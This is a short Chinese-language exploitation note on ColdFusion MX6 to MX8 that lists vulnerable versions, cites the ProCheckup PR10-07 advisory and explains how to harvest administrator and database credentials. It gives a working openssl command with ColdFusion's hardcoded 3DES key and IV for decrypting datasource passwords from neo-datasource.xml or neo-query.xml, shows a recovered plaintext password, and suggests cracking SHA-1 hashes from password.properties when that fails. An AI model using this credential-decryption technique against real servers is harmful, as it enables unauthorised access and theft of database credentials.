Versions tested and found vulnerable
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07

只有当encrypted=false的时候,password.properties文件里的密码才是明文的,否则是sha-1加密的
也可以查看数据库配置文件neo-datasource.xml(ColdFusion8)或者neo-query.xml(Coldfusion6/7 Datasource password),这里的数据库连接信息是可以解密的,方法如下:

$ echo kbfcWw1HIjbWGA8xe7rd4w==|openssl des-ede3 -a -d -K 30794A21403124723870304C4072312436794A214031726A -iv 30794A2140312472; echo

9d5Xp6D1 <—-明文密码

如果上述明文无法登陆,那么就去破解sha1吧

ColdFusion后台利用方法.pdf